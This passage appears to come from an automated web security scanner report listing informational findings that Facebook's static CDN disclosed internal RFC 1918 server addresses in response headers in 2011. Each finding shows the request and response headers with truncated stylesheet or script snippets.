GET /rsrc.php/v1/y9/r/PVBa_VtP99O.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Apr 2011 01:52:16 GMT
X-FB-Server: 10.138.64.185
Vary: Accept-Encoding
Content-Length: 891
Cache-Control: public, max-age=22398513
Expires: Tue, 03 Apr 2012 20:46:21 GMT
Date: Tue, 19 Jul 2011 14:57:48 GMT
Connection: close

/*1301949888,176832697*/

.fbQuestionsBlingBox{padding:3px 4px;margin-left:-1px;margin-right:-1px;color:#3B5998 !important}
.fbQuestionsBlingBox:hover{text-decoration:none;background-color:#eceff5;bor
...[SNIP]...

24.46. http://static.ak.fbcdn.net/rsrc.php/v1/yA/r/C9intiNq_3N.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yA/r/C9intiNq_3N.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.17.184

Request

GET /rsrc.php/v1/yA/r/C9intiNq_3N.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Fri, 08 Jul 2011 16:38:00 GMT
X-FB-Server: 10.138.17.184
Content-Length: 5336
Vary: Accept-Encoding
Cache-Control: public, max-age=30599691
Expires: Sat, 07 Jul 2012 18:53:36 GMT
Date: Tue, 19 Jul 2011 14:58:45 GMT
Connection: close

/*1310151230,176820664*/

.ego_page.notes #pagelet_ego_pane{padding-top:52px}
.notesBlogText{font-size: 11px;line-height:1.5em;word-wrap:break-word}
.notesBlogText ul{list-style-type:square;margin:10p
...[SNIP]...

24.47. http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/PTQolaY4o54.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yB/r/PTQolaY4o54.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.17.183

Request

GET /rsrc.php/v1/yB/r/PTQolaY4o54.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/careers/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 19 Apr 2011 01:56:05 GMT
X-FB-Server: 10.138.17.183
Content-Length: 10833
Vary: Accept-Encoding
Cache-Control: public, max-age=27388462
Expires: Thu, 31 May 2012 14:52:13 GMT
Date: Tue, 19 Jul 2011 14:57:51 GMT
Connection: close

/*1306939856,176820663*/

.padded{padding:10px}
.rounded_container{margin:0;padding:0}
.inside_rounded{padding-bottom:0;margin-bottom:5px}
.careers_full{width:940px;margin-left:auto;margin-right:auto}
...[SNIP]...

24.48. http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/PzNsk8U51ji.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yB/r/PzNsk8U51ji.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.64.185

Request

GET /rsrc.php/v1/yB/r/PzNsk8U51ji.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 02:07:07 GMT
X-FB-Server: 10.138.64.185
Content-Length: 3423
Vary: Accept-Encoding
Cache-Control: public, max-age=30813756
Expires: Tue, 10 Jul 2012 06:21:19 GMT
Date: Tue, 19 Jul 2011 14:58:43 GMT
Connection: close

/*1310365367,176832697*/

.GrowthInviteStory_Logo{background:#fff;border:1px solid #ccc}
.GrowthInviteStory_ThreePhotos{float:left;margin-right:10px}
.GrowthInviteStory_ThreePhotos img{margin:0 5px 5p
...[SNIP]...

24.49. http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/y_PXXLWHa9g.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yB/r/y_PXXLWHa9g.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.16.183

Request

GET /rsrc.php/v1/yB/r/y_PXXLWHa9g.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/help/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 02:27:41 GMT
X-FB-Server: 10.138.16.183
Vary: Accept-Encoding
Content-Length: 854
Cache-Control: public, max-age=30239653
Expires: Tue, 03 Jul 2012 14:52:12 GMT
Date: Tue, 19 Jul 2011 14:57:59 GMT
Connection: close

/*1309791207,176820407*/

if (window.CavalryLogger) { CavalryLogger.start_js(["Ubvhc"]); }

function contact_dialog_async_with_form(a){var b=new AsyncRequest().setMethod('GET').setReadOnly(true).setDa
...[SNIP]...

24.50. http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/08tONxelrvf.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yD/r/08tONxelrvf.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.17.184

Request

GET /rsrc.php/v1/yD/r/08tONxelrvf.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/find-friends?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 01:56:59 GMT
X-FB-Server: 10.138.17.184
Vary: Accept-Encoding
Content-Length: 356
Cache-Control: public, max-age=30837728
Expires: Tue, 10 Jul 2012 12:59:37 GMT
Date: Tue, 19 Jul 2011 14:57:29 GMT
Connection: close

/*1310389245,176820664*/

.sp_35gihh{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zP/r/FzmFaNDPhjU.png);background-repeat:no-repeat;display:inline-block;height:35px;width:35px}
.sx_a395
...[SNIP]...

24.51. http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/V-zkfHT8CXb.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yD/r/V-zkfHT8CXb.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.64.182

Request

GET /rsrc.php/v1/yD/r/V-zkfHT8CXb.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/find-friends?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 02:08:28 GMT
X-FB-Server: 10.138.64.182
Vary: Accept-Encoding
Content-Length: 827
Cache-Control: public, max-age=30807776
Expires: Tue, 10 Jul 2012 04:40:24 GMT
Date: Tue, 19 Jul 2011 14:57:28 GMT
Connection: close

/*1310359292,176832694*/

.sp_8vdyqc{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zX/r/MeNKGPh4G4i.png);background-repeat:no-repeat;display:inline-block;height:16px;width:16px}
.sx_44ac
...[SNIP]...

24.52. http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/XByeV_qA1Uh.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yD/r/XByeV_qA1Uh.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.196

Request

GET /rsrc.php/v1/yD/r/XByeV_qA1Uh.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/pages/create.php?ref_type=sitefooter
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 19 Apr 2011 01:56:00 GMT
X-FB-Server: 10.30.147.196
X-Cnection: close
Content-Length: 5944
Vary: Accept-Encoding
Cache-Control: public, max-age=24883313
Expires: Wed, 02 May 2012 14:59:41 GMT
Date: Tue, 19 Jul 2011 14:57:48 GMT
Connection: close

/*1304434782,169776068*/

#contentArea .uiHeader{margin-left:44px}
.co_reg_banner{width:100%}
.step_frame{padding:25px 55px 20px;background:#f7f7f7;width:650px;margin-bottom:30px}
.step_frame #progres
...[SNIP]...

24.53. http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/4F3Iv5NBJOL.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yE/r/4F3Iv5NBJOL.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.69.183

Request

GET /rsrc.php/v1/yE/r/4F3Iv5NBJOL.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 02:34:56 GMT
X-FB-Server: 10.138.69.183
Content-Length: 3435
Vary: Accept-Encoding
Cache-Control: public, max-age=30198128
Expires: Tue, 03 Jul 2012 03:20:53 GMT
Date: Tue, 19 Jul 2011 14:58:45 GMT
Connection: close

/*1309749684,176833975*/

.pagerpro_container{float:right;margin:0 0 0 0;padding:3px 0 4px 0;width:200px}
.pagerpro{float:right}
.pagerpro .pagerpro_li{display:inline}
.pagerpro .pagerpro_a{padding:3p
...[SNIP]...

24.54. http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/lwKG0ViYlaK.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yE/r/lwKG0ViYlaK.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.192

Request

GET /rsrc.php/v1/yE/r/lwKG0ViYlaK.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/advertising/?campaign_id=402047449186&placement=pflo&extra_1=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 02:15:36 GMT
X-FB-Server: 10.30.148.192
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 865
Cache-Control: public, max-age=30425838
Expires: Thu, 05 Jul 2012 18:35:04 GMT
Date: Tue, 19 Jul 2011 14:57:46 GMT
Connection: close

/*1309977261,169776320*/

.sp_4e7vaj{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zL/r/7mQ0CTXxgPa.png);background-repeat:no-repeat;display:inline-block;height:128px;width:258px}
.sx_52
...[SNIP]...

24.55. http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/rwkuDRWV9jd.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yE/r/rwkuDRWV9jd.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.190

Request

GET /rsrc.php/v1/yE/r/rwkuDRWV9jd.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/find-friends?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 13 Jun 2011 02:12:33 GMT
X-FB-Server: 10.30.148.190
X-Cnection: close
Content-Length: 2388
Vary: Accept-Encoding
Cache-Control: public, max-age=28437979
Expires: Tue, 12 Jun 2012 18:23:47 GMT
Date: Tue, 19 Jul 2011 14:57:28 GMT
Connection: close

/*1307989546,169776318*/

.friendBrowserCheckboxFilters{width:200px;margin:0 auto;float:left}
.friendBrowserCheckboxFilterHeader{margin-bottom:3px}
.friendBrowserCheckboxFilterTypeahead{margin-top:3px
...[SNIP]...

24.56. http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/2zvsC0zVzMB.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yF/r/2zvsC0zVzMB.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.69.182

Request

GET /rsrc.php/v1/yF/r/2zvsC0zVzMB.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/advertising/?campaign_id=402047449186&placement=pflo&extra_1=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 19 Apr 2011 01:53:56 GMT
X-FB-Server: 10.138.69.182
Content-Length: 8541
Vary: Accept-Encoding
Cache-Control: public, max-age=26698741
Expires: Wed, 23 May 2012 15:16:46 GMT
Date: Tue, 19 Jul 2011 14:57:45 GMT
Connection: close

/*1306250209,176833974*/

.business_pages .product_selector ul,
.business_pages .banner_content,
.business_pages .tabs,
.business_pages .ads_info,
.business_pages .contact_sales{margin:0 auto;width:73
...[SNIP]...

24.57. http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/FUYS70vIS4_.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yF/r/FUYS70vIS4_.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.146.197

Request

GET /rsrc.php/v1/yF/r/FUYS70vIS4_.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 02:07:47 GMT
X-FB-Server: 10.30.146.197
X-Cnection: close
Content-Length: 3539
Vary: Accept-Encoding
Cache-Control: public, max-age=30803417
Expires: Tue, 10 Jul 2012 03:28:34 GMT
Date: Tue, 19 Jul 2011 14:58:17 GMT
Connection: close

/*1310354862,169775813*/

.bulkTaggerTypeahead{width:210px}
.bulk_tagger_body .bulkTagIcon{margin-top:6px;margin-right:7px}
.bulk_tagger_body .bulkTagStatus{display:inline-block;padding-top:4px}
.bulk
...[SNIP]...

24.58. http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/gQh69rr8JBH.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yF/r/gQh69rr8JBH.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.64.182

Request

GET /rsrc.php/v1/yF/r/gQh69rr8JBH.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Fri, 15 Jul 2011 21:15:22 GMT
X-FB-Server: 10.138.64.182
Content-Length: 28645
Vary: Accept-Encoding
Cache-Control: public, max-age=31214528
Expires: Sat, 14 Jul 2012 21:40:25 GMT
Date: Tue, 19 Jul 2011 14:58:17 GMT
Connection: close

/*1310766057,176832694*/

.fbChatBuddyList .subheader,.fbChatBuddyList .hide_idle_marker,.fbChatBuddyList .suppress,.fbChatBuddyList .hide_empty_item,.fbChatBuddyList .hide_friend_list,.fbChatBuddyLis
...[SNIP]...

24.59. http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/sobEsVhahXR.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yF/r/sobEsVhahXR.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.198

Request

GET /rsrc.php/v1/yF/r/sobEsVhahXR.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/find-friends?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 02:05:29 GMT
X-FB-Server: 10.30.145.198
X-Cnection: close
Content-Length: 13148
Vary: Accept-Encoding
Cache-Control: public, max-age=30881285
Expires: Wed, 11 Jul 2012 01:05:33 GMT
Date: Tue, 19 Jul 2011 14:57:28 GMT
Connection: close

/*1310432708,169775558*/

.callout_parent_box{position:relative;z-index:6}
.callout_outer_box{background-repeat:no-repeat;position:absolute}
.callout_inner_box{margin:15px;position:relative;overflow:h
...[SNIP]...

24.60. http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/Bqaiy6eGUJa.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yG/r/Bqaiy6eGUJa.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.17.184

Request

GET /rsrc.php/v1/yG/r/Bqaiy6eGUJa.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 16 May 2011 02:38:12 GMT
X-FB-Server: 10.138.17.184
Content-Length: 1396
Vary: Accept-Encoding
Cache-Control: public, max-age=25994679
Expires: Tue, 15 May 2012 11:43:23 GMT
Date: Tue, 19 Jul 2011 14:58:44 GMT
Connection: close

/*1305546144,176820664*/

.stream-search-pages .Search_Name{font-weight:bold}
.profile .stream-search-pages .highlight{background:none;border:none;margin:0;padding:0}
.stream-search-pages .uiStreamMes
...[SNIP]...

24.61. http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/gh8wxcAgNvK.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yG/r/gh8wxcAgNvK.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.146.196

Request

GET /rsrc.php/v1/yG/r/gh8wxcAgNvK.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/badges/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 19 Apr 2011 01:53:38 GMT
X-FB-Server: 10.30.146.196
X-Cnection: close
Content-Length: 1299
Vary: Accept-Encoding
Cache-Control: public, max-age=23675218
Expires: Wed, 18 Apr 2012 15:24:31 GMT
Date: Tue, 19 Jul 2011 14:57:33 GMT
Connection: close

/*1303226710,169775812*/

.badgesMarketing .mainContent{width:960px}
.widgets_central_box{float:left;margin:20px 0 0;width:390px}
.widgets_central_box .desc{float:left;font-size: 13px;line-height:18px
...[SNIP]...

24.62. http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/87W0ancRJRW.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yH/r/87W0ancRJRW.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.197

Request

GET /rsrc.php/v1/yH/r/87W0ancRJRW.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 02:25:52 GMT
X-FB-Server: 10.30.145.197
X-Cnection: close
Content-Length: 5072
Vary: Accept-Encoding
Cache-Control: public, max-age=30815245
Expires: Tue, 10 Jul 2012 06:46:05 GMT
Date: Tue, 19 Jul 2011 14:58:40 GMT
Connection: close

/*1310366755,169775557*/

.fbProfileLargePortrait{margin:2px 0 0 1px;width:75px;word-wrap:break-word}
.fbProfileLargePortrait .photoCrop{background:#eee;height:75px;overflow:hidden;position:absolute;w
...[SNIP]...

24.63. http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/sHCa4y3LzLj.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yH/r/sHCa4y3LzLj.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.195

Request

GET /rsrc.php/v1/yH/r/sHCa4y3LzLj.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/careers/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 20 Jun 2011 02:22:05 GMT
X-FB-Server: 10.30.145.195
X-Cnection: close
Content-Length: 13857
Vary: Accept-Encoding
Cache-Control: public, max-age=28986708
Expires: Tue, 19 Jun 2012 02:49:39 GMT
Date: Tue, 19 Jul 2011 14:57:51 GMT
Connection: close

/*1308538213,169775555*/

.UIMediaHeader_Container{overflow:hidden}
.UIMediaHeader_BottomMargin{padding-bottom:17px}
.UIMediaHeader_TitleWrapper{border-bottom:1px solid #d8dfea;padding:10px 0 5px;z-in
...[SNIP]...

24.64. http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/_J12hr-nH-4.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yI/r/_J12hr-nH-4.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.64.184

Request

GET /rsrc.php/v1/yI/r/_J12hr-nH-4.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Thu, 14 Jul 2011 04:05:17 GMT
X-FB-Server: 10.138.64.184
Content-Length: 2813
Vary: Accept-Encoding
Cache-Control: public, max-age=31065773
Expires: Fri, 13 Jul 2012 04:21:37 GMT
Date: Tue, 19 Jul 2011 14:58:44 GMT
Connection: close

/*1310617246,176832696*/

#chatFriendsOnline .navigationLink span{background:url(http://static.ak.fbcdn.net/rsrc.php/v1/zW/r/AebrcwrBeG6.png) no-repeat right 3px;padding:0 12px 0 2px}
#chatFriendsOnli
...[SNIP]...

24.65. http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/d3jsdgznlXU.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yI/r/d3jsdgznlXU.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.192

Request

GET /rsrc.php/v1/yI/r/d3jsdgznlXU.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/badges/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

